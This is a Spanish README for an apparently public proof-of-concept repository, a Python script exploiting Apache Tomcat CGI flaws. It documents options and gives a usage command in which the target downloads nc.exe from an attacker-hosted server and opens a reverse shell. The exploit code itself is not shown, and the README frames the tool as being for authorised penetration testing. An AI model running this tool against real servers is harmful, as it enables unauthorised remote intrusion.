# Script de Exploit CGI de Apache Tomcat
## Descripción
Un script de Python diseñado para explotar vulnerabilidades CGI en servidores Apache Tomcat mediante la ejecución de una conexión de shell inversa.
## Ejemplo de Uso

## Características
- Exploit automatizado para vulnerabilidades CGI de Apache Tomcat
- Parámetros de objetivo y atacante personalizables
- Interfaz de línea de comandos sencilla
## Requisitos Previos
- Python 3.x
- Biblioteca `requests`
- Netcat (nc.exe)
- Acceso a un listener para recibir el shell inverso
## Instalación
```bash
git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
```
## Uso
```bash
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
```
### Argumentos Obligatorios
- `-t, --target`: Dirección IP del objetivo con Apache Tomcat
- `-i, --ip`: Dirección IP del atacante que aloja nc.exe
- `-ncp, --nc-port`: Puerto para la conexión de shell inverso
### Argumentos Opcionales
- `-p, --port`: Puerto del objetivo (por defecto: 8080)
- `-sp, --server-port`: Puerto del servidor para alojar nc.exe (por defecto: 80)
- `-cgi, --cgi-script`: Nombre del script CGI a explotar (por defecto: cmd.bat)
## Ejemplo
```bash
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
```
## Descargo de Responsabilidad Legal
Esta herramienta se proporciona únicamente para propósitos educativos y pruebas de penetración autorizadas. El autor y los colaboradores no son responsables de ningún mal uso o daño causado por este script. Siempre obtenga autorización adecuada antes de probar cualquier sistema.
## Autor
- Jose Miguel Romero (k3Pn1c)
[4.0K] /data/pocs/8dbacd1bb6fbbc8b6b3bfbfd70692159803599af
├── [4.0K] assets
│ ├── [ 92K] exploit.png
│ └── [ 58K] nc.exe
├── [1.7K] README.md
└── [2.2K] tomcat_cgi_exploit.py
1 directory, 4 files